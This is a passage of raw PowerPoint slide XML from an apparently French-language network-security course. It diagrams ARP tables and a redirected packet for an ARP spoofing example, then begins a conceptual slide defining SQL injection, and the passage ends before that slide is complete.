        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1003300" y="5518150"/>
            <a:ext cx="10175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ARP TABLE A</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58" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157163" y="5822950"/>
            <a:ext cx="4730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MAC</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59" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1666875" y="5822950"/>
            <a:ext cx="24606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61" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1666875" y="6132513"/>
            <a:ext cx="10175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192.168.1.2</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62" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157162" y="6119018"/>
            <a:ext cx="10002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sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ccc:cccc:cccc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="5421312"/>
            <a:ext cx="2805112"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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="5427662"/>
            <a:ext cx="278606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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="5737225"/>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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="5737225"/>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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="6046787"/>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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="6046787"/>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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="6356350"/>
            <a:ext cx="1509712"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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="6356350"/>
            <a:ext cx="12763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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="5730875"/>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2" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="5737225"/>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3" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="6046787"/>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4" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="6356350"/>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5" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="5421312"/>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6" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11895246" y="5421312"/>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7" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="5427662"/>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8" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="6665912"/>
            <a:ext cx="27987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9" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10047396" y="5475287"/>
            <a:ext cx="10175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ARP TABLE A</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80" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9201259" y="5780087"/>
            <a:ext cx="4730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MAC</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81" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10710971" y="5780087"/>
            <a:ext cx="24606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83" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10710971" y="6089650"/>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192.168.1.1</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84" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9201258" y="6076155"/>
            <a:ext cx="10002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sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ccc:cccc:cccc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="94" name="Tableau 93"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6232733" y="1619159"/>
          <a:ext cx="2798894" cy="944546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="325554">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> C</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="271930"/>
            <a:ext cx="2787650"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6" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="581493"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="581493"/>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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="891055"/>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9" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="891055"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="1200618"/>
            <a:ext cx="1516063"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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="1200618"/>
            <a:ext cx="1271588" cy="309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2" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="575143"/>
            <a:ext cx="0" cy="9413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3" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="581493"/>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4" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="891055"/>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5" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1200618"/>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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="265580"/>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7" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9021521" y="265580"/>
            <a:ext cx="0" cy="12509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8" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="271930"/>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9" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1510180"/>
            <a:ext cx="28003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0" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7172084" y="319555"/>
            <a:ext cx="9108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ARP TABLE C</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111" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="624355"/>
            <a:ext cx="474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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a: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112" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="624355"/>
            <a:ext cx="2460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rgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="933918"/>
            <a:ext cx="1134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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="933918"/>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effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="1218993"/>
            <a:ext cx="12311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sz="1400" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bbb:bbbb:bbbb</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="1218993"/>
            <a:ext cx="86562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effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Connecteur en angle 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1848065" y="2779716"/>
            <a:ext cx="3626367" cy="909328"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99864"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="115" name="Tableau 114"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213102404"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6227521" y="2731206"/>
          <a:ext cx="2465658" cy="846663"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{7DF18680-E054-41AD-8BC1-D1AEF772440D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2465658"/>
              </a:tblGrid>
              <a:tr h="846663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC DST :</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>bbbb:bbbb:bbbb</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>IP DST: 192.168.1.2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Data: secret</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55087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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11416665" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il s’agit de la vulnérabilité des applications Web la plus répandue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>sur Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>faille concerne les applications et non pas les bases de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>données </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L’injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>SQL est une technique utilisée pour exploiter la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>vulnérabilité d’absence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de validation des données entrées pour envoyer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>des commandes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>SQL à des bases de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Problématique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: absence de distinction entre le plan de contrôle et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>le plan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de données dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
